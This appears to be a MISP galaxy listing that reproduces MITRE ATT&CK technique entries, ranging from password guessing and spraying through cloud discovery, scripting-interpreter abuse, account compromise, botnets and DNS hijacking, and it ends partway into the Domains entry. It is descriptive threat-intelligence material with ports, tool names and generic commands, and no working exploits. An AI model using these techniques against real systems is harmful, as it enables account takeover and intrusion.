Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.

Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. [Cylance Cleaver]

Typically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following:

  • SSH (22/TCP)
  • Telnet (23/TCP)
  • FTP (21/TCP)
  • NetBIOS / SMB / Samba (139/TCP & 445/TCP)
  • LDAP (389/TCP)
  • Kerberos (88/TCP)
  • RDP / Terminal Services (3389/TCP)
  • HTTP/HTTP Management Services (80/TCP & 443/TCP)
  • MSSQL (1433/TCP)
  • Oracle (1521/TCP)
  • MySQL (3306/TCP)
  • VNC (5900/TCP)
  • SNMP (161/UDP and 162/TCP/UDP)

In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.[US-CERT TA18-068A 2018]. Further, adversaries may abuse network device interfaces (such as wlanAPI) to brute force accessible wifi-router(s) via wireless authentication protocols.[Trend Micro Emotet 2020]

In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.

Internal MISP references

UUID e849ebcc-e0af-45a5-aefa-c394bb759b4e which can be used as unique global reference for Password Guessing in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1110.001
Related clusters

To see the related clusters, click here.

Password Spraying

Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. [BlackHillsInfosec Password Spraying]

Typically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:

  • SSH (22/TCP)
  • Telnet (23/TCP)
  • FTP (21/TCP)
  • NetBIOS / SMB / Samba (139/TCP & 445/TCP)
  • LDAP (389/TCP)
  • Kerberos (88/TCP)
  • RDP / Terminal Services (3389/TCP)
  • HTTP/HTTP Management Services (80/TCP & 443/TCP)
  • MSSQL (1433/TCP)
  • Oracle (1521/TCP)
  • MySQL (3306/TCP)
  • VNC (5900/TCP)

In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.[US-CERT TA18-068A 2018]

In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.

Internal MISP references

UUID e63414a7-c6f7-4bcf-a6eb-25b0c4ddbb2a which can be used as unique global reference for Password Spraying in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1110.003
Related clusters

To see the related clusters, click here.

Brute Force

Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.

Brute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to Valid Accounts within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as OS Credential Dumping, Account Discovery, or Password Policy Discovery. Adversaries may also combine brute forcing activity with behaviors such as External Remote Services as part of Initial Access.

Internal MISP references

UUID c16eef78-232e-47a2-98e9-046ec075b13c which can be used as unique global reference for Brute Force in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Containers', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Network', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Build Image on Host

Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote build request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.[Docker Build Image]

An adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may utilize Deploy Container using that custom image.[Aqua Build Images on Hosts][Aqua Security Cloud Native Threat Report June 2021] If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment.

Internal MISP references

UUID 49749e13-48ed-49fc-82d1-13ae13b457c1 which can be used as unique global reference for Build Image on Host in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers']
source MITRE
Related clusters

To see the related clusters, click here.

Clipboard Data

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

For example, on Windows adversaries can access clipboard data by using clip.exe or Get-Clipboard.[MSDN Clipboard][clip_win_server][CISA_AA21_200B] Additionally, adversaries may monitor then replace users’ clipboard with their data (e.g., Transmitted Data Manipulation).[mining_ruby_reversinglabs]

macOS and Linux also have commands, such as pbpaste, to grab clipboard contents.[Operating with EmPyre]

Internal MISP references

UUID e8f90b73-2e59-4643-a274-78b85b8d9f88 which can be used as unique global reference for Clipboard Data in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Cloud Administration Command

Adversaries may abuse cloud management services to execute commands within virtual machines or hybrid-joined devices. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. Similarly, in Azure AD environments, Microsoft Endpoint Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to the Azure AD.[AWS Systems Manager Run Command][Microsoft Run Command][SpecterOps Lateral Movement from Azure to On-Prem AD 2020]

If an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment’s virtual machines or on-premises hybrid-joined devices. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a Trusted Relationship to execute commands in connected virtual machines.[MSTIC Nobelium Oct 2021]

Internal MISP references

UUID 944a7b91-c58e-567d-9e2c-515b93713c50 which can be used as unique global reference for Cloud Administration Command in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'IaaS']
source MITRE
Related clusters

To see the related clusters, click here.

Cloud Infrastructure Discovery

An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.

Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock API to retrieve access block configuration for a bucket.[Amazon Describe Instance][Amazon Describe Instances API][AWS Get Public Access Block][AWS Head Bucket] Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project [Google Compute Instances], and Azure's CLI command az vm list lists details of virtual machines.[Microsoft AZ CLI] In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through Wordlist Scanning.[Malwarebytes OSINT Leaky Buckets - Hioureas]

An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.[Expel IO Evil in AWS] The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.[Mandiant M-Trends 2020]An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources. [AWS Describe DB Instances] Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in Cloud Service Discovery, this technique focuses on the discovery of components of the provided services rather than the services themselves.

Internal MISP references

UUID fd346e4e-b22f-4cae-bc24-946d7b14b5e1 which can be used as unique global reference for Cloud Infrastructure Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS']
source MITRE
Related clusters

To see the related clusters, click here.

Cloud Service Dashboard

An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.[Google Command Center Dashboard]

Depending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.

Internal MISP references

UUID 315ce434-ad6d-4dae-a1dd-6db944a44422 which can be used as unique global reference for Cloud Service Dashboard in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Google Workspace', 'IaaS', 'Office 365']
source MITRE
Related clusters

To see the related clusters, click here.

Cloud Service Discovery

An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.

Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.[Azure - Resource Manager API][Azure AD Graph API]

For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.[Azure - Stormspotter][GitHub Pacu]

Adversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through Disable or Modify Tools or Disable or Modify Cloud Logs.

Internal MISP references

UUID 5d0a3722-52b6-4968-a367-7ca6bc9a33fc which can be used as unique global reference for Cloud Service Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Google Workspace', 'IaaS', 'Office 365', 'SaaS']
source MITRE
Related clusters

To see the related clusters, click here.

Cloud Storage Object Discovery

Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to File and Directory Discovery on a local host, after identifying available storage services (i.e. Cloud Infrastructure Discovery) adversaries may access the contents/objects stored in cloud infrastructure.

Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS [ListObjectsV2] and List Blobs in Azure[List Blobs] .

Internal MISP references

UUID 92761d92-a288-4407-a112-bb2720f07d07 which can be used as unique global reference for Cloud Storage Object Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS']
source MITRE
Related clusters

To see the related clusters, click here.

AppleScript

Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.[Apple AppleScript] These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.

Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.[SentinelOne AppleScript]

AppleScripts do not need to call osascript to execute. However, they may be executed from within mach-O binaries by using the macOS Native APINSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility.

Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute Native APIs, which otherwise would require compilation and execution in a mach-O binary file format.[SentinelOne macOS Red Team] Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via Python.[Macro Malware Targets Macs]

Internal MISP references

UUID 9f06ef9b-d587-41d3-8fc8-7d539dac5701 which can be used as unique global reference for AppleScript in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1059.002
Related clusters

To see the related clusters, click here.

Cloud API

Adversaries may abuse cloud APIs to execute malicious commands. APIs available in cloud environments provide various functionalities and are a feature-rich method for programmatic access to nearly all aspects of a tenant. These APIs may be utilized through various methods such as command line interpreters (CLIs), in-browser Cloud Shells, PowerShell modules like Azure for PowerShell[Microsoft - Azure PowerShell], or software developer kits (SDKs) available for languages such as Python.

Cloud API functionality may allow for administrative access across all major services in a tenant such as compute, storage, identity and access management (IAM), networking, and security policies.

With proper permissions (often via use of credentials such as Application Access Token and Web Session Cookie), adversaries may abuse cloud APIs to invoke various functions that execute malicious actions. For example, CLI and PowerShell functionality may be accessed through binaries installed on cloud-hosted or on-premises hosts or accessed through a browser-based cloud shell offered by many cloud platforms (such as AWS, Azure, and GCP). These cloud shells are often a packaged unified environment to use CLI and/or scripting modules hosted as a container in the cloud environment.

Internal MISP references

UUID af798e80-2cc5-5452-83e4-9560f08bf2d5 which can be used as unique global reference for Cloud API in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1059.009
Related clusters

To see the related clusters, click here.

JavaScript

Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.[NodeJS]

JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the Component Object Model and Internet Explorer HTML Application (HTA) pages.[JScrip May 2018][Microsoft JScript 2007][Microsoft Windows Scripts]

JavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and AppleScript. Scripts can be executed via the command line utility osascript, they can be compiled into applications or script files via osacompile, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.[Apple About Mac Scripting 2016][SpecterOps JXA 2020][SentinelOne macOS Red Team][Red Canary Silver Sparrow Feb2021][MDSec macOS JXA and VSCode]

Adversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a Drive-by Compromise or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of Obfuscated Files or Information.

Internal MISP references

UUID 8a669da8-8894-4fb0-9124-c3c8418985cc which can be used as unique global reference for JavaScript in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1059.007
Related clusters

To see the related clusters, click here.

Network Device CLI

Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands.

Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or SSH.

Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection.[Cisco Synful Knock Evolution]

Internal MISP references

UUID 284bfbb3-99f0-4c3d-bc1f-ab74065b7907 which can be used as unique global reference for Network Device CLI in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1059.008
Related clusters

To see the related clusters, click here.

PowerShell

Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.[TechNet PowerShell] Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).

PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.

A number of PowerShell-based offensive testing tools are available, including Empire, PowerSploit, PoshC2, and PSAttack.[Github PSAttack]

PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).[Sixdub PowerPick Jan 2016][SilentBreak Offensive PS Dec 2015][Microsoft PSfromCsharp APR 2014]

Internal MISP references

UUID 6ca7838a-e8ad-43e8-9da6-15b640d1cbde which can be used as unique global reference for PowerShell in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1059.001
Related clusters

To see the related clusters, click here.

Python

Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.

Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.

Internal MISP references

UUID 68fed1c9-e060-4c4d-83d9-d8c817893d65 which can be used as unique global reference for Python in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1059.006
Related clusters

To see the related clusters, click here.

Unix Shell

Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.[DieNet Bash][Apple ZShell] Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.

Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with SSH. Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.

Internal MISP references

UUID 3eafcd8b-0cb8-4d23-8785-3f80a3c897c7 which can be used as unique global reference for Unix Shell in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1059.004
Related clusters

To see the related clusters, click here.

Visual Basic

Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as Component Object Model and the Native API through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.[VB .NET Mar 2020][VB Microsoft]

Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.[Microsoft VBA][Wikipedia VBA] VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of JavaScript on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).[Microsoft VBScript]

Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into Spearphishing Attachment payloads (which may also involve Mark-of-the-Web Bypass to enable execution).[Default VBS macros Blocking ]

Internal MISP references

UUID 0340ed34-6db2-4979-bf73-2c16855867b4 which can be used as unique global reference for Visual Basic in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1059.005
Related clusters

To see the related clusters, click here.

Windows Command Shell

Adversaries may abuse the Windows command shell for execution. The Windows command shell (cmd) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via Remote Services such as SSH.[SSH in Windows]

Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may leverage cmd to execute various commands and payloads. Common uses include cmd to execute a single command, or abusing cmd interactively with input and output forwarded over a command and control channel.

Internal MISP references

UUID be095bcc-4769-4010-b2db-3033d01efdbe which can be used as unique global reference for Windows Command Shell in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1059.003
Related clusters

To see the related clusters, click here.

Command and Scripting Interpreter

Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell.

There are also cross-platform interpreters such as Python, as well as those commonly associated with client applications such as JavaScript and Visual Basic.

Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in Initial Access payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various Remote Services in order to achieve remote Execution.[Powershell Remote Commands][Cisco IOS Software Integrity Assurance - Command History][Remote Shell Execution in Python]

Internal MISP references

UUID a2184d53-63b1-4c40-81ed-da799080c36c which can be used as unique global reference for Command and Scripting Interpreter in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Network', 'Office 365', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Communication Through Removable Media

Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by Replication Through Removable Media. Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.

Internal MISP references

UUID 0783c499-1564-4062-addc-f1ff86ef4e59 which can be used as unique global reference for Communication Through Removable Media in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Cloud Accounts - Duplicate2

Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for Exfiltration to Cloud Storage or to Upload Tools. Cloud accounts can also be used in the acquisition of infrastructure, such as Virtual Private Servers or Serverless infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.[Awake Security C2 Cloud]

A variety of methods exist for compromising cloud accounts, such as gathering credentials via Phishing for Information, purchasing credentials from third-party sites, conducting Password Spraying attacks, or attempting to Steal Application Access Tokens.[MSTIC Nobelium Oct 2021] Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a Trusted Relationship between service providers and their customers.[MSTIC Nobelium Oct 2021]

Internal MISP references

UUID 4b187604-88ab-4972-9836-90a04c705e10 which can be used as unique global reference for Cloud Accounts - Duplicate2 in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1586.003
Related clusters

To see the related clusters, click here.

Email Accounts - Duplicate

Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct Phishing for Information, Phishing, or large-scale spam email campaigns. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: Domains).

A variety of methods exist for compromising email accounts, such as gathering credentials via Phishing for Information, purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.[AnonHBGary][Microsoft DEV-0537] Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Adversaries may target compromising well-known email accounts or domains from which malicious spam or Phishing emails may evade reputation-based email filtering rules.

Adversaries can use a compromised email account to hijack existing email threads with targets of interest.

Internal MISP references

UUID 49ae7bf1-a313-41d6-ad4c-74efc4c80ab6 which can be used as unique global reference for Email Accounts - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1586.002
Related clusters

To see the related clusters, click here.

Social Media Accounts - Duplicate

Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. Social Media Accounts), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona.

A variety of methods exist for compromising social media accounts, such as gathering credentials via Phishing for Information, purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).[AnonHBGary] Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.

Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.

Adversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others.[NEWSCASTER2014][BlackHatRobinSage] Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: Spearphishing via Service).

Internal MISP references

UUID 3426077d-3b9c-4f77-a1c6-d68f0dea670e which can be used as unique global reference for Social Media Accounts - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1586.001
Related clusters

To see the related clusters, click here.

Compromise Accounts

Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. Establish Accounts), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona.

A variety of methods exist for compromising accounts, such as gathering credentials via Phishing for Information, purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.[AnonHBGary][Microsoft DEV-0537] Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.

Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.

Adversaries may directly leverage compromised email accounts for Phishing for Information or Phishing.

Internal MISP references

UUID c6374cbe-799a-4648-b1e2-2a66bb42d3f3 which can be used as unique global reference for Compromise Accounts in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Compromise Client Software Binary

Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers.

Adversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)[Unit42 Banking Trojans Hooking 2022] prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.[ESET FontOnLake Analysis 2021]

Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host.

Internal MISP references

UUID 05435e33-05fe-4a41-b8e4-694d45eb9147 which can be used as unique global reference for Compromise Client Software Binary in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Botnet

Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.[Norton Botnet] Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems.[Imperva DDoS for Hire] Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.[Dell Dridex Oct 2015] With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale Phishing or Distributed Denial of Service (DDoS).

Internal MISP references

UUID 66caa162-711c-44ac-b96d-0552cf328f84 which can be used as unique global reference for Botnet in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1584.005
Related clusters

To see the related clusters, click here.

DNS Server - Duplicate

Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: Application Layer Protocol). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.

By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.[Talos DNSpionage Nov 2018][FireEye DNS Hijack 2019] Additionally, adversaries may leverage such control in conjunction with Digital Certificates to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.[FireEye DNS Hijack 2019][Crowdstrike DNS Hijack 2019] Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.[CiscoAngler][Proofpoint Domain Shadowing]

Internal MISP references

UUID 83e4f633-67fb-4d87-b1b3-8a7a2e60778b which can be used as unique global reference for DNS Server - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1584.002
Related clusters

To see the related clusters, click here.

Domains

Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.[ICANNDomainNameHijacking] Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.[Krebs DNS Hijack 2019]

